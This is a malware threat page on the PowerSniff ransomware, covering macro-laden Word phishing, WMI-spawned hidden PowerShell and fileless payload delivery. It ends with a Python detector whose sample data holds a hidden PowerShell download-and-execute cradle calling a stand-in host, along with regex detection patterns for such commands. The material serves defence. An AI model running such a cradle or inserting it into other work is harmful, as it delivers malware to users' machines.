
PowerSniff Ransomware

By GoldSparrow in Ransomware

Threat Scorecard

Threat Level: 80 % (High)
Infected Computers: 7
First Seen: April 6, 2016
Last Seen: February 27, 2023
OS(es) Affected: Windows

The PowerSniff Ransomware is a ransomware Trojan that abuses Microsoft Office macros and Windows PowerShell to infect computers. The PowerSniff Ransomware is being used in attacks in the United States and Europe. Although the PowerSniff Ransomware is not aimed at specific organizations, the campaign actively selects certain industries and sectors for infection while deliberately avoiding others.

The Distribution and Infection Methods Used by the PowerSniff Ransomware

The PowerSniff Ransomware abuses Office macros and PowerShell on targeted computers, a method of attack that has grown in popularity over the last year. The PowerSniff Ransomware may be distributed through malicious email attachments sent in spam campaigns. Thousands of email messages carrying the PowerSniff Ransomware have been sent in the last few weeks. There are several reasons why the PowerSniff Ransomware email attachments have been particularly effective in reaching their targets:

  1. The PowerSniff Ransomware phishing email messages may contain specific information about the target, including the target's name, phone number and company data, which makes them look legitimate.
  2. The email attachment used to distribute the PowerSniff Ransomware is a Microsoft Word document, a file type that had not recently been associated with attacks. The document carries a macro, and the attack relies on the victim authorizing the use of macros in the file; once macros are enabled, the embedded code runs and delivers the payload to the victim's computer.
  3. The sheer volume of spam email being sent out to deliver the PowerSniff Ransomware is staggering: PC security analysts detected about 1,500 messages (only a fraction of the total number) in a single week.

When the file containing the PowerSniff Ransomware is opened and macros are enabled, the macro calls on Windows Management Instrumentation (WMI), a Windows service, to create a hidden PowerShell instance. This automation tool, an important and useful part of Windows, is abused to deliver the PowerSniff Ransomware itself to the victim's computer. Launching PowerShell through WMI rather than directly from the macro has a detection consequence: in process telemetry, the parent of the PowerShell process is the WMI provider host, not the Word process, so detections that only look for Office spawning PowerShell will miss this chain. To carry out the attack, it is generally necessary for the victim to authorize the use of macros in Microsoft Office.

How the PowerSniff Ransomware Attacks a Computer

During the PowerSniff Ransomware attack, PowerShell downloads a script that decrypts and executes the payload, but only after first confirming that it is not being run in a virtual machine or analysis sandbox. There are several peculiarities about the PowerSniff Ransomware attack. Before proceeding, the PowerSniff Ransomware checks that it is not operating on a computer belonging to an education or healthcare facility. To do this, the PowerSniff Ransomware searches for certain strings on the victim's computer. The PowerSniff Ransomware also checks for strings that indicate the presence of Point of Sale (PoS) software and of programs commonly used to process sales and other transactions. It seems that the PowerSniff Ransomware infections are targeted specifically at computers used in monetary transactions, and actively avoid computers belonging to education or healthcare institutions.

The PowerSniff Ransomware does not Create a File on the Victim’s Computer

One of the characteristics of the PowerSniff Ransomware is that it does not require the creation of an executable file on the victim's computer to carry out its attack. The PowerSniff Ransomware belongs to the Ursnif family, malware whose payload is injected directly into the targeted computer's memory rather than written to disk. Because there is no executable file to remove or analyze, the PowerSniff Ransomware is particularly difficult to detect or contain with file-based scanning alone, and presents a significant threat to computers. PC security researchers strongly advise the use of a reliable, fully updated security program and an anti-spam filter to intercept a PowerSniff Ransomware attack. Computer users should disable macros in Microsoft Office and avoid enabling macros in files received from unknown or questionable sources (particularly unsolicited email messages, whose attachments should never be opened).
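Because the payload never touches disk, process-creation telemetry is the practical place to catch the chain described above (macro, WMI-launched hidden PowerShell, download cradle). The following is an added example written for this page, not code from the original article or from any vendor product. It scores Sysmon-style process-creation events and correlates a PowerShell launch with a recent Office process start, so it also catches the WMI-spawned case where Word is not PowerShell's parent; it generalizes slightly beyond the text by also flagging the simpler case of Office spawning PowerShell directly. The events, paths, GUIDs, timestamps, URL and score weights are all constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style (Event ID 1) process-creation events, not real telemetry.
# Parent/child links use ProcessGuid, so the chain can be walked even when
# PowerShell's parent is the WMI provider host rather than WINWORD.EXE.
SAMPLE_EVENTS = [
    {"UtcTime": "2016-04-06 10:00:00.000", "ProcessGuid": "A1", "ParentProcessGuid": "00",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"UtcTime": "2016-04-06 10:01:10.000", "ProcessGuid": "B2", "ParentProcessGuid": "A1",
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"UtcTime": "2016-04-06 10:01:25.000", "ProcessGuid": "C3", "ParentProcessGuid": "S1",
     "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": "WmiPrvSE.exe"},
    # Hidden PowerShell created through WMI: parent is WmiPrvSE.exe, not Word.
    {"UtcTime": "2016-04-06 10:01:26.000", "ProcessGuid": "D4", "ParentProcessGuid": "C3",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass "
                     "-Command \"IEX (New-Object Net.WebClient).DownloadString("
                     "'http://example.invalid/s.ps1')\"")},
    # Benign admin PowerShell, half an hour later, launched from Explorer.
    {"UtcTime": "2016-04-06 10:30:00.000", "ProcessGuid": "E5", "ParentProcessGuid": "A1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
WMI_HOST = "wmiprvse.exe"
OFFICE_WINDOW = timedelta(minutes=5)  # assumed correlation window after an Office launch

# Command-line indicators: (reason label, weight, pattern). Weights are illustrative.
CMDLINE_INDICATORS = [
    ("hidden_window",   1, re.compile(r"-w\w*\s+hidden", re.I)),
    ("encoded_command", 1, re.compile(r"-e(?:nc\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", 2, re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I)),
    ("policy_bypass",   1, re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
]
ALERT_THRESHOLD = 3


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def score_event(ev, by_guid, office_starts):
    """Return (score, reasons) for one event; non-PowerShell events score 0."""
    if basename(ev["Image"]) not in POWERSHELL_IMAGES:
        return 0, []
    score, reasons = 0, []
    parent = by_guid.get(ev["ParentProcessGuid"])
    parent_name = basename(parent["Image"]) if parent else ""
    if parent_name == WMI_HOST:          # the PowerSniff-style launch via WMI
        score += 2; reasons.append("wmi_spawned_powershell")
    elif parent_name in OFFICE_IMAGES:   # the plain macro-spawns-PowerShell variant
        score += 2; reasons.append("office_spawned_powershell")
    for label, weight, rx in CMDLINE_INDICATORS:
        if rx.search(ev["CommandLine"]):
            score += weight; reasons.append(label)
    # Correlate with an Office process that started shortly before this launch.
    t = parse_time(ev["UtcTime"])
    if any(timedelta(0) <= t - ot <= OFFICE_WINDOW for ot in office_starts):
        score += 1; reasons.append("office_opened_recently")
    return score, reasons


def detect(events):
    """Return alerts (dicts) for PowerShell launches scoring at or above the threshold."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    office_starts = [parse_time(e["UtcTime"]) for e in events
                     if basename(e["Image"]) in OFFICE_IMAGES]
    alerts = []
    for ev in events:
        score, reasons = score_event(ev, by_guid, office_starts)
        if score >= ALERT_THRESHOLD:
            alerts.append({"ProcessGuid": ev["ProcessGuid"], "score": score,
                           "reasons": reasons, "CommandLine": ev["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["ProcessGuid"], a["score"], a["reasons"])
```

On the constructed events, only the WMI-launched instance (D4) is reported; the later administrative PowerShell run from Explorer with a script file scores zero. In production the same logic would be fed from Sysmon or EDR process events, and the time-window correlation should be keyed on hostname and user as well as on time.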

